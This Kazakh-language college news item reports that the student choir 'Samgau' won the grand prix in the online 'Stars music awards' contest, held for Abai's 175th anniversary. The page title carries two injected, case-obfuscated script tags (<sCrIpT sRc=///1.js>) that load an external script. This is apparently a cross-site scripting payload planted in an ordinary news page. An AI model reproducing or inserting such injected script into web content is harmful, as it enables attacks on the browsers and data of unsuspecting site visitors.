Премия «Stars music awards»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
13.09.2020
Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің «Самғау» студенттердің біріккен хоры «Жаңғыру» шығармашылық орталығының ұйымдастыруымен өткен халықаралық «Премия «Stars music awards» онлайн байқауының гран-при иегерлері атанды. Жетекшісі: Әшірбекова Гүлжан Асқарқызы.
Абайдың 175 жылдық мерейтойына орай Қазақстанның дарынды жастарын қолдау мақсатында ұйымдастырылған байқау 5 номинация бойынша өтті. Студенттеріміз «Эстрадалық вокал» номинациясы бойынша өз бақтарын сынап, жеңіс тұғырынан көріне білді.
Просмотров: 474